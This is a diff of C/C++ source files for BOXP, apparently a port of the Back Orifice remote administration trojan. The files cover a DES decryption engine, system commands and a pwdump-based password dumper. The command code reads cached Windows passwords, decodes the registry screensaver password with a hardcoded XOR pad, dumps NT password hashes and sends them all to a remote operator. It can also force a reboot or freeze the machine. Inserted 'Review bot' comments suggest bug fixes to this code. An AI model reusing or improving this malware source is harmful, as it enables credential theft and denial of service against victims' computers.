work[0]; work[0] = work[1]; work[1] = tmp; // Do the 16 rounds in reverse order for (i=15; i >= 0; i--) des_round(gs, i,work, kn); // Inverse initial permutation #ifndef BIG_ENDIAN work[0] = byteswap(work[0]); work[1] = byteswap(work[1]); #endif des_permute(gs, (BYTE *)work,fperm,block); } // setkey: // initializes key schedule array // key is 64 bits (will use only 56) void des_setkey(BYTE *key, BYTE kn[16][8]) { BYTE pc1m[56]; // place to modify pc1 into BYTE pcr[56]; // place to rotate pc1 into register int i,j,l,m; // Clear key schedule for (i=0; i<16; i++) { for (j=0; j<8; j++) { kn[i][j]=0; } } // Convert pc1 to bits of key for(j=0; j<56; j++) { l=pc1[j]-1; // integer bit location m = l & 07; // find bit pc1m[j]= (char)((key[l>>3] & // find which key byte l is in bytebit[m]) // and which bit of that byte ? 
1 : 0); // and store 1-bit result } // Key chunk for each iteration for (i=0; i<16; i++) { // Rotate pc1 the right amount for (j=0; j<56; j++) pcr[j] = pc1m[(l=j+totrot[i])<(j<28? 28 : 56) ? l: l-28]; // Rotate left and right halves independently for (j=0; j<48; j++) { // select bits individually // check bit that goes to kn[j] if (pcr[pc2[j]-1]) { // mask it in if it's there l= j % 6; kn[i][j/6] |= (BYTE)(bytebit[l] >> 2); } } } } void des_str_to_key(BYTE *str, BYTE *key) { int i; key[0] = (str[0]>>1); key[1] = ((str[0]&0x01)<<6) | (str[1]>>2); key[2] = ((str[1]&0x03)<<5) | (str[2]>>3); key[3] = ((str[2]&0x07)<<4) | (str[3]>>4); key[4] = ((str[3]&0x0F)<<3) | (str[4]>>5); key[5] = ((str[4]&0x1F)<<2) | (str[5]>>6); key[6] = ((str[5]&0x3F)<<1) | (str[6]>>7); key[7] = (str[6]&0x7F); for (i=0;i<8;i++) key[i] = (BYTE)(key[i]<<1); } int BOAPI DESHash_Insert(GS *gs) { spinit(); perminit(iperm, ip); perminit(fperm, fp); return 0; } int BOAPI DESHash_Remove(GS *gs) { return 0; } char * BOAPI DESHash_Query(void) { return "DES: BOXP DES Hash Manipulation"; } void * BOAPI DESHash_Startup(GS *gs) { DESHASH_DATA *data; data=(DESHASH_DATA *)gs->fct.malloc(sizeof(DESHASH_DATA), gs); if(data==NULL) return NULL; return data; } int BOAPI DESHash_Shutdown(GS *gs, void *pInternal) { DESHASH_DATA *data=(DESHASH_DATA *)pInternal; gs->fct.free(data, gs); return 0; } int BOAPI DESHash_SetEncryptKey(GS *gs, void *pInternal, const char *svKey) { return 0; } int BOAPI DESHash_SetDecryptKey(GS *gs, void *pInternal, const char *svKey) { DESHASH_DATA *data=(DESHASH_DATA *)pInternal; BYTE key[8]; des_str_to_key((BYTE *)svKey,key); des_setkey(key,data->kn); return 0; } char * BOAPI DESHash_GetEncryptKey(GS *gs, void *pInternal) { return NULL; } char * BOAPI DESHash_GetDecryptKey(GS *gs, void *pInternal) { return NULL; } BYTE * BOAPI DESHash_Encrypt(GS *gs, void *pInternal, BYTE *pBuffer,int nBufLen,int *pnOutBufLen) { *pnOutBufLen=0; return NULL; } BYTE * BOAPI DESHash_Decrypt(GS *gs, void 
*pInternal, BYTE *pBuffer,int nBufLen,int *pnOutBufLen) { DESHASH_DATA *data=(DESHASH_DATA *)pInternal; BYTE *buf; int nOutBufLen,i; if(nBufLen&7) nOutBufLen=(nBufLen&~7)+8; else nOutBufLen=nBufLen; buf=(BYTE *)gs->fct.malloc(nOutBufLen, gs); if(buf==NULL) return NULL; gs->fct.memset(buf,0,nOutBufLen); gs->fct.memcpy(buf,pBuffer,nBufLen); for(i=0;i<nOutBufLen;i+=8) { des_dedes(gs, (BYTE *)buf+i,data->kn); } *pnOutBufLen=nOutBufLen; return buf; } int BOAPI DESHash_CreateNewKeys(GS *gs, void *pInternal) { return 0; } void BOAPI DESHash_Free(GS *gs, void *pInternal, BYTE *pBuffer) { DESHASH_DATA *data=(DESHASH_DATA *)pInternal; gs->fct.free(pBuffer, gs); } ENCRYPTION_ENGINE *GetDESHashEngine(void) { g_DESengine.pInsert=DESHash_Insert; g_DESengine.pRemove=DESHash_Remove; g_DESengine.pQuery=DESHash_Query; g_DESengine.pStartup=DESHash_Startup; g_DESengine.pShutdown=DESHash_Shutdown; g_DESengine.pSetEncryptKey=DESHash_SetEncryptKey; g_DESengine.pSetDecryptKey=DESHash_SetDecryptKey; g_DESengine.pGetEncryptKey=DESHash_GetEncryptKey; g_DESengine.pGetDecryptKey=DESHash_GetDecryptKey; g_DESengine.pEncrypt=DESHash_Encrypt; g_DESengine.pDecrypt=DESHash_Decrypt; g_DESengine.pCreateNewKeys=DESHash_CreateNewKeys; g_DESengine.pFree=DESHash_Free; return &g_DESengine; } --- NEW FILE: cmd_system.h --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 
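Review bot: As the braces read on this page, perminit does not close its clearing loops before `// each input nibble position`: the fill loops sit inside the first iteration of the clear and reuse `i` and `j`, so only `perm[0][0]` is zeroed, and the outer loops exit because the inner ones leave both counters at 16. The tables come out right only because `iperm` and `fperm` are zero-initialised globals. Close the two outer clearing loops right after the `k` loop (`perm[i][j][k]=0; } } }`) and drop the two surplus braces at the end of the function. Separately, DESHash_SetDecryptKey hands `svKey` to des_str_to_key, which reads `str[0]` through `str[6]` with no length check. DESHash_Decrypt copies `nBufLen` bytes without rejecting a negative length or a NULL `pInternal`, and leaves `*pnOutBufLen` unset when the allocation fails.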
You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #ifndef __INC_CMD_SYSTEM_H #define __INC_CMD_SYSTEM_H #include<windows.h> //#include<auth.h> bool BOAPI CmdProc_SysReboot( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); bool BOAPI CmdProc_SysLockup( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); bool BOAPI CmdProc_SysListPasswords( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); bool BOAPI CmdProc_SysViewConsole( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); bool BOAPI CmdProc_SysInfo( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); typedef BOOL (FAR PASCAL *CACHECALLBACK)( struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData ); typedef DWORD (WINAPI *ENUMPASSWORD)(LPSTR pbPrefix, WORD cbPrefix, BYTE nType, CACHECALLBACK pfnCallback, DWORD dwRefData); extern ENUMPASSWORD WNetEnumCachedPasswords; struct PASSWORD_CACHE_ENTRY { WORD cbEntry; WORD cbResource; WORD cbPassword; BYTE iEntry; BYTE nType; char abResource[1]; }; #endif --- NEW FILE: cmd_system.cpp --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
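Review bot: cmd_system.h declares `extern ENUMPASSWORD WNetEnumCachedPasswords;`, but the only definition in the part of cmd_system.cpp shown is `ENUMPASSWORD pWNetEnumCachedPasswords;`, so any unit that uses the declared name would fail at link time; the declaration should read `extern ENUMPASSWORD pWNetEnumCachedPasswords;`. The `ENUMPASSWORD` typedef is repeated verbatim in cmd_system.cpp and should live only in the header. `CmdProc_SysViewConsole` is declared here but neither defined nor registered in the files shown. The header uses `GS`, `BOCMD_CTX` and `BOAPI` while including only `<windows.h>`, so it compiles only when the includer has already pulled in `srv_linkage.h`.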
See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #include <srv_linkage.h> #include "dumppw.h" #include "main.h" #include "cmd_system.h" char * BOAPI xtoa ( unsigned __int64 val, char *buf, unsigned radix, bool is_neg ) { char *p; /* pointer to traverse string */ char *firstdig; /* pointer to first digit */ char temp; /* temp char */ unsigned digval; /* value of digit */ p = buf; if (is_neg) { /* negative, so output '-' and negate */ *p++ = '-'; val = (unsigned __int64)(-(__int64)val); } firstdig = p; /* save pointer to first digit */ do { digval = (unsigned) (val % radix); val /= radix; /* get next digit */ /* convert to ascii and store */ if (digval > 9) *p++ = (char) (digval - 10 + 'a'); /* a letter */ else *p++ = (char) (digval + '0'); /* a digit */ } while (val > 0); /* We now have the digit of the number in the buffer, but in reverse order. Thus we reverse them now. 
*/ *p-- = '\0'; /* terminate string; p points to last digit */ do { temp = *p; *p = *firstdig; *firstdig = temp; /* swap *p and *firstdig */ --p; ++firstdig; /* advance to next two digits */ } while (firstdig < p); /* repeat until halfway */ return buf; } typedef DWORD (WINAPI *ENUMPASSWORD)(LPSTR pbPrefix, WORD cbPrefix, BYTE nType, CACHECALLBACK pfnCallback, DWORD dwRefData); ENUMPASSWORD pWNetEnumCachedPasswords; bool BOAPI CmdProc_SysReboot( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { BOOL bRet; bRet=gs->api.pExitWindowsEx(EWX_FORCE|EWX_REBOOT, 0); if(bRet==0) gs->fct.IssueAuthCmdReply( gs, ctx, BCC_ERR, "Reboot attempt failed.\n"); else gs->fct.IssueAuthCmdReply( gs, ctx, 0, "Rebooting now.\n" ); return true; } DWORD WINAPI LockThread(LPVOID param) { while(1); return 0; } bool BOAPI CmdProc_SysLockup( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { gs->fct.IssueAuthCmdReply( gs, ctx, BCC_INFO, "Locking up machine\n[Don't expect much to work afte doing this!]\n"); gs->api.pSleep(2000); if(gs->gv.bIsWinNT) { API *api = &gs->api; api->pSetPriorityClass(api->pGetCurrentProcess(),REALTIME_PRIORITY_CLASS); while(1) { DWORD dwTid; HANDLE hThread=api->pCreateThread(NULL,0,LockThread,NULL,0,&dwTid); api->pSetThreadPriority(hThread,THREAD_PRIORITY_TIME_CRITICAL); } } else { lockpoint: __asm { cli jmp lockpoint } } return 0; } #pragma pack(push,1) typedef struct { GS *gs; char *pBuffer; int nBufLen; int nBufPos; } PASSCACHECALLBACK_DATA; #pragma pack(pop) BOOL PASCAL PassCacheCallback(struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData) { char buff[1024]; char buff2[1024]; int nCount; GS *gs; PASSCACHECALLBACK_DATA *dat; dat = (PASSCACHECALLBACK_DATA *)dwRefData; gs = dat->gs; nCount=pce->cbResource; if( nCount>1023 ) nCount=1023; gs->fct.memmove(buff, pce->abResource, nCount); buff[nCount] = 0; CharToOem(buff, buff2); if((dat->nBufPos+gs->api.plstrlen(buff2))>=dat->nBufLen) return FALSE; 
gs->api.plstrcpy(dat->pBuffer+dat->nBufPos,buff2); dat->nBufPos+=gs->api.plstrlen(buff2)+1; nCount=pce->cbPassword; if(nCount>1023) nCount=1023; gs->fct.memmove(buff, pce->abResource+pce->cbResource, nCount); buff[nCount] = 0; CharToOem(buff, buff2); if((dat->nBufPos+gs->api.plstrlen(buff2))>=dat->nBufLen) return FALSE; gs->api.plstrcpy(dat->pBuffer+dat->nBufPos,buff2); dat->nBufPos+=gs->api.plstrlen(buff2)+1; return TRUE; } bool BOAPI CmdProc_SysListPasswords( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { API *api = &gs->api; FCT *fct = &gs->fct; char svBuffer[512]; DWORD dwBufSize; char svReply[512]; if (gs->gv.bIsWinNT) { // PWDump style password dumping DumpPasswordHashes(gs, ctx); } else { HINSTANCE hMpr=api->pLoadLibrary("MPR.DLL"); pWNetEnumCachedPasswords = (ENUMPASSWORD)api->pGetProcAddress(hMpr, "WNetEnumCachedPasswords"); // Return passwords from password cache fct->IssueAuthCmdReply( gs, ctx, 0, "Passwords cached by system:\n"); PASSCACHECALLBACK_DATA dat; dat.pBuffer=(char *)fct->malloc(65536, gs); dat.nBufLen=65536; dat.nBufPos=0; dat.gs=gs; pWNetEnumCachedPasswords(NULL, 0, 0xff, PassCacheCallback, (DWORD) &dat); fct->IssueAuthCmdReply( gs, ctx, 0, "Cached Passwords: \n" ); char *svStr; svStr=dat.pBuffer; while(*svStr!='\0') { char *svRsc=svStr; svStr+=api->plstrlen(svStr)+1; char *svPwd=svStr; svStr+=api->plstrlen(svStr)+1; char svBuff[1024]; api->pwsprintf(svBuff, "Resource: '%.256s' Password: '%.256s'\n", svRsc, svPwd); fct->IssueAuthCmdReply( gs, ctx, 0, svBuff ); } fct->free(dat.pBuffer, gs); fct->IssueAuthCmdReply( gs, ctx, 0, "End of cached passwords.\n" ); // Return screen saver password char *regpws[5] = { ".Default", "Control Panel", "desktop", "" }; HKEY key=HKEY_USERS,key2; int l; DWORD indx=0; while(regpws[indx][0]) { l=api->pRegOpenKeyEx(key, regpws[indx], 0, KEY_READ, &key2) ; if(key!=HKEY_USERS) api->pRegCloseKey(key); if(l!=ERROR_SUCCESS) { api->plstrcpy(svReply,"There is no screensaver password.\n"); goto 
exitssavepw; } key = key2; indx++; } dwBufSize=512; if(api->pRegQueryValueEx(key, "ScreenSave_Data", NULL, NULL, (BYTE *)svBuffer, &dwBufSize)!=ERROR_SUCCESS) { api->plstrcpy(svReply, "Unable to read value 'ScreenSave_Data'.\n"); } else { // decode hex chars for (indx = 0; indx < dwBufSize/2; indx++) { char c1,c2; c1=svBuffer[indx*2]; if(c1>='A' && c1<='F') c1=(c1-'A')+0xA; else if(c1>='a' && c1<='f') c1=(c1-'a')+0xA; else if(c1>='0' && c1<='9') c1=c1-'0'; c2=svBuffer[indx*2+1]; if(c2>='A' && c2<='F') c2=(c2-'A')+0xA; else if(c2>='a' && c2<='f') c2=(c2-'a')+0xA; else if(c2>='0' && c2<='9') c2=c2-'0'; svBuffer[indx] = (c1<<4) | c2; } // xor with pad unsigned char xorpattern[60] = {0x48, 0xEE, 0x76, 0x1D, 0x67, 0x69, 0xA1, 0x1B, 0x7A, 0x8C, 0x47, 0xF8, 0x54, 0x95, 0x97, 0x5F, 0x78, 0xd9, 0xda, 0x6c, 0x59, 0xd7, 0x6B, 0x35, 0xC5, 0x77, 0x85, 0x18, 0x2A, 0x0E, 0x52, 0xFF, 0x00, 0xE3, 0x1B, 0x71, 0x8D, 0x34, 0x63, 0xEB, 0x91, 0xC3, 0x24, 0x0F, 0xB7, 0xC2, 0xF8, 0xE3, 0xB6, 0x54, 0x4C, 0x35, 0x54, 0xE7, 0xC9, 0x49, 0x28, 0xA3, 0x85, 0x11}; DWORD len; len=dwBufSize/2; if(len>60) len=60; for (indx = 0; indx < len; indx++) { svBuffer[indx] ^= xorpattern[indx]; } svBuffer[len] = '\0'; api->pwsprintf(svReply, "ScreenSaver password: '%s'\n", svBuffer); } api->pRegCloseKey(key); exitssavepw: fct->IssueAuthCmdReply( gs, ctx, 0, svReply ); } return true; } bool BOAPI CmdProc_SysViewConsole( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { return false; } bool BOAPI CmdProc_SysInfo( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { API *api = &gs->api; FCT *fct = &gs->fct; char svBuffer[512]; DWORD dwBufSize; char svReply[512]; OSVERSIONINFOEX osvi; // OS information bool bOsVersionInfoEx; // have used OSVERSIONINFOEX or OSVERSIONINFO? 
SYSTEM_INFO sysInfo; // Processor/hardware info ///////////////////////////////////////////// // Send back computer name // Regresar el nombre de la computadora dwBufSize = MAX_COMPUTERNAME_LENGTH+1; if(api->pGetComputerName(svBuffer, &dwBufSize)==FALSE) { fct->IssueAuthCmdReply( gs, ctx, BCC_ERR, "Could not retrieve machine name.\n" ); } else { api->pwsprintf(svReply, "System info for machine '%.400s'\n", svBuffer); fct->IssueAuthCmdReply( gs, ctx, 0, svReply ); } ///////////////////////////////////////////// // Send back currently logged in user name // Regresar el usuario actualmente en session dwBufSize = 512; if(api->pGetUserName(svBuffer, &dwBufSize)==FALSE) { fct->IssueAuthCmdReply( gs, ctx, BCC_ERR, "Could not retrieve user name.\n" ); } else { api->pwsprintf(svReply, "Current user: '%.400s'\n", svBuffer); fct->IssueAuthCmdReply( gs, ctx, 0, svReply ); } ///////////////////////////////////////////// // Send back processor info // Regresar la informacion del procesador api->plstrcpy(svReply, "Processor: "); api->pGetSystemInfo(&sysInfo); switch (sysInfo.dwProcessorType) { case PROCESSOR_INTEL_386: api->plstrcat(svReply, "I386\n"); break; case PROCESSOR_INTEL_486: api->plstrcat(svReply, "I486\n"); break; case PROCESSOR_INTEL_PENTIUM: api->plstrcat(svReply, "I586\n"); break; case PROCESSOR_MIPS_R4000: api->plstrcat(svReply, "MIPSR4000\n"); break; default: api->plstrcat(svReply, "UNKNOWN\n"); break; } fct->IssueAuthCmdReply( gs, ctx, 0, svReply ); ///////////////////////////////////////////// // Send back operative system info. // Regresar la informacion del sistema operativo. /////////////////////////////////////////////////////////////////////// // Atention: This part of code uses the last MS Platform SDK source // files (for OSVERSIONINFOEX structure). // You need to get them if you are using Visual Studio 6. 
/////////////////////////////////////////////////////////////////////// // Atencion: Esta parte del código usa los ultimos archivos de MS // Platform SDK (para la estructura OSVERSIONINFOEX). // Necesita obtenerlos si usa Visual Studio 6. /////////////////////////////////////////////////////////////////////// // Try calling GetVersionEx using the OSVERSIONINFOEX structure. // If that fails, try using the OSVERSIONINFO structure. fct->memset(&osvi,0, sizeof(OSVERSIONINFOEX)); osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); if( !(bOsVersionInfoEx = (bool)(GetVersionEx ((OSVERSIONINFO *) &osvi)==TRUE?true:false) ) ) { // If OSVERSIONINFOEX doesn't work, try OSVERSIONINFO. osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if ( GetVersionEx ( (OSVERSIONINFO *) &osvi)==FALSE) { api->plstrcpy(svReply, "Could not get version info.\n"); goto done; } } switch (osvi.dwPlatformId) { case VER_PLATFORM_WIN32_NT: // Test for the product. if ( osvi.dwMajorVersion <= 4 ) api->plstrcpy( svReply, "Windows NT 4"); if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0 ) api->plstrcpy( svReply, "Windows 2000 "); if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1 ) api->plstrcpy( svReply, "Windows XP "); // Test for product type. 
if( bOsVersionInfoEx ) { if ( osvi.wProductType == VER_NT_WORKSTATION ) { if( osvi.wSuiteMask & VER_SUITE_PERSONAL ) api->plstrcat( svReply," Personal " ); else api->plstrcat( svReply," Professional " ); } else if ( osvi.wProductType == VER_NT_SERVER ) { if( osvi.wSuiteMask & VER_SUITE_DATACENTER ) api->plstrcat( svReply," DataCenter Server " ); else if( osvi.wSuiteMask & VER_SUITE_ENTERPRISE ) api->plstrcat( svReply," Advanced Server " ); else api->plstrcat( svReply," Server " ); } } else { HKEY hKey; char szProductType[80]; DWORD dwBufLen; RegOpenKeyEx( HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\ProductOptions", 0, KEY_QUERY_VALUE, &hKey ); RegQueryValueEx( hKey, "ProductType", NULL, NULL, (LPBYTE) szProductType, &dwBufLen); RegCloseKey( hKey ); if ( lstrcmpi( "WINNT", szProductType) == 0 ) api->plstrcat( svReply," Professional " ); if ( lstrcmpi( "LANMANNT", szProductType) == 0 ) api->plstrcat( svReply," Server " ); if ( lstrcmpi( "SERVERNT", szProductType) == 0 ) api->plstrcat( svReply," Advanced Server " ); } // Display version, service pack (if any), and build number. 
if ( osvi.dwMajorVersion <= 4 ) { api->pwsprintf( svReply,"%s Version %d.%d %s (Build %d)\n", svReply, osvi.dwMajorVersion, osvi.dwMinorVersion, osvi.szCSDVersion, osvi.dwBuildNumber & 0xFFFF); } else { api->pwsprintf( svReply,"%s %s (Build %d)\n", svReply, osvi.szCSDVersion, osvi.dwBuildNumber & 0xFFFF); } break; case VER_PLATFORM_WIN32_WINDOWS: if (osvi.dwMajorVersion == 4 && osvi.dwMinorVersion == 0) { api->plstrcpy( svReply, "Windows 95 "); if ( osvi.szCSDVersion[1] == 'C' || osvi.szCSDVersion[1] == 'B' ) api->plstrcat( svReply, "OSR2 " ); } if (osvi.dwMajorVersion == 4 && osvi.dwMinorVersion == 10) { api->plstrcpy( svReply, "Windows 98 "); if ( osvi.szCSDVersion[1] == 'A' ) api->plstrcat( svReply, "SE " ); } if (osvi.dwMajorVersion == 4 && osvi.dwMinorVersion == 90) { api->plstrcpy( svReply, "Windows ME "); } break; case VER_PLATFORM_WIN32s: api->plstrcpy( svReply, "Microsoft Win32s "); break; } api->plstrcat( svReply, "\n" ); done: fct->IssueAuthCmdReply( gs, ctx, 0, svReply ); ///////////////////////////////////////////// // Send back global memory usage // Regresar el uso global de la memoria MEMORYSTATUS memstat; DWORD dw,dw2,dw3,dw4; char stot[22],sfree[22]; ULARGE_INTEGER ddwFreeC,ddwTotBytes,ddwTotFreeBytes; char c; int x; memstat.dwLength = sizeof(memstat); api->pGlobalMemoryStatus(&memstat); api->pwsprintf(svReply, "Memory: %dM in use: %d%% Page file: %dM free: %dM\n", memstat.dwTotalPhys/1024/1024, memstat.dwMemoryLoad, memstat.dwTotalPageFile/1024/1024, memstat.dwAvailPageFile/1024/1024 ); fct->IssueAuthCmdReply( gs, ctx, 0, svReply ); for (c = 'C'; c <= 'Z'; c++) { api->pwsprintf(svReply, "%c:\\", c); x = api->pGetDriveType(svReply); api->plstrcat( svReply, " - "); switch (x) { case 0: api->plstrcat(svReply, "Unable to determine.\n"); break; case 1: svReply[0]='\0'; break; case DRIVE_REMOVABLE: api->plstrcat(svReply, "Removable\n"); break; case DRIVE_FIXED: api->plstrcat(svReply, "Fixed"); api->pwsprintf(svBuffer, "%c:\\", c); // Intentar con 
GetDiskFreeSpaceEx // try with GetDiskFreeSpaceEx. if ( api->pGetDiskFreeSpaceEx && api->pGetDiskFreeSpaceEx(svBuffer,&ddwFreeC,&ddwTotBytes,&ddwTotFreeBytes) ) { xtoa(ddwTotBytes.QuadPart,stot,10,false); xtoa(ddwTotFreeBytes.QuadPart,sfree,10,false); dw = (DWORD) (ddwTotFreeBytes.QuadPart / (1024*1024)); dw2 = (DWORD) (ddwTotBytes.QuadPart / (1024*1024)); api->pwsprintf(svBuffer, " Bytes free: %u MB(%s)/%u MB(%s)\n", dw,sfree,dw2,stot ); api->plstrcat(svReply, svBuffer); } else if ( api->pGetDiskFreeSpace(svBuffer, &dw, &dw2, &dw3, &dw4) ) { api->pwsprintf(svBuffer, " Bytes free: %u MB(%u)/%u MB(%u)\n", (dw3*dw2*dw/(1024*1024)),(unsigned int)(dw3*dw2*dw), (dw4*dw2*dw/(1024*1024)),(unsigned int)(dw4*dw2*dw)); api->plstrcat(svReply, svBuffer); } else gs->api.plstrcat(svReply,"\n"); break; case DRIVE_REMOTE: api->plstrcat(svReply, "Remote\n"); break; case DRIVE_CDROM: api->plstrcat(svReply, "CD-ROM\n"); break; case DRIVE_RAMDISK: api->plstrcat(svReply, "Ramdisk\n"); break; default: api->plstrcat(svReply, "Unknown type!\n"); break; } if(api->plstrlen(svReply)) fct->IssueAuthCmdReply( gs, ctx, 0, svReply ); } fct->IssueAuthCmdReply( gs, ctx, 0, "End of system info.\n"); return true; } --- NEW FILE: main.h --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 
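Review bot: In CmdProc_SysInfo, the fallback branch taken when the OSVERSIONINFOEX call fails passes `dwBufLen` to `RegQueryValueEx` uninitialised and ignores the results of both `RegOpenKeyEx` and `RegQueryValueEx`. As a result `szProductType` can reach `lstrcmpi` unset and unterminated, and `hKey` can be closed without ever having been opened. Declare `DWORD dwBufLen = sizeof(szProductType);`, start with `szProductType[0] = '\0';`, and run the comparisons only when both calls return `ERROR_SUCCESS`. In the same function, `pwsprintf(svReply, "%s Version %d.%d %s (Build %d)\n", svReply, ...)` formats the buffer into itself, which is not safe to rely on; build the line in `svBuffer` and copy it back. An NT version matching none of the three tests (5.2, for example) never resets `svReply`, so the product text is appended to the previous "Processor:" reply; a default `plstrcpy(svReply, "Windows NT ")` before the tests would fix that.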
You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #ifndef __INC_MAIN_H #define __INC_MAIN_H #include <srv_linkage.h> #include "main.h" #include "cmd_process.h" #include "cmd_system.h" // ------------- Function Implementations ------------------ extern HINSTANCE g_hInstance; extern BOOL g_bActive; #endif --- NEW FILE: dumppw.cpp --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ // DumpPW - Thanks to Jeremy Allison for pwdump, it was // what this was based on. 
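Review bot: main.h includes itself with `#include "main.h"` inside its own guard, which is a no-op that only obscures the real dependencies and should be removed. The banner `// ------------- Function Implementations ------------------` sits above two `extern` declarations; it looks copied from main.cpp, and `// ------------- Global Declarations ------------------` would describe what the header holds. main.cpp (shown earlier in the message) also defines `g_nCmdNum[7]`, which is not declared here. If other translation units are meant to use it, add `extern int g_nCmdNum[7];`, otherwise mark it `static` in main.cpp.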
#include <stdarg.h> #include <srv_linkage.h> #include "deshash.h" #include "main.h" DWORD hexstrtoul(char *str) { DWORD val; int i; char c1; val=0; for(i=0;i<8;i++) { if(*str=='\0') break; c1=*str++; if(c1>='A' && c1<='F') c1=(c1-'A')+0xA; else if(c1>='a' && c1<='f') c1=(c1-'a')+0xA; else if(c1>='0' && c1<='9') c1=(c1-'0'); val<<=4; val|=c1; } return val; } // // Utility function to get allocate a SID from a name. // Looks on local machine. SID is allocated with malloc // and must be freed by the caller. // Returns TRUE on success, FALSE on fail. // static BOOL get_sid(GS *gs, const char *name, SID **ppsid) { FCT *fct = &gs->fct; SID_NAME_USE sid_use; char *domain; DWORD sid_size = 0; DWORD dom_size = 0; *ppsid = 0; if(LookupAccountName(0, name, 0, &sid_size, 0, &dom_size, &sid_use) == 0) { if(GetLastError() != ERROR_INSUFFICIENT_BUFFER) return FALSE; } *ppsid = (SID *)fct->malloc(sid_size, gs); domain = (char *)fct->malloc(dom_size, gs); if(*ppsid == 0 || domain == 0) { if(*ppsid) fct->free(*ppsid, gs); if(domain) fct->free(domain, gs); *ppsid = 0; return FALSE; } if(LookupAccountName(0, name, *ppsid, &sid_size, domain, &dom_size, &sid_use)==0) { fct->free(*ppsid, gs); fct->free(domain, gs); *ppsid = 0; return FALSE; } fct->free(domain, gs); return TRUE; } // // Utility function to setup a security descriptor // from a varargs list of char *name followed by a DWORD access // mask. The access control list is allocated with malloc // and must be freed by the caller. // returns TRUE on success, FALSE on fail. // static BOOL __cdecl create_sd_from_list( GS *gs, SECURITY_DESCRIPTOR *sdout, int num, ...) 
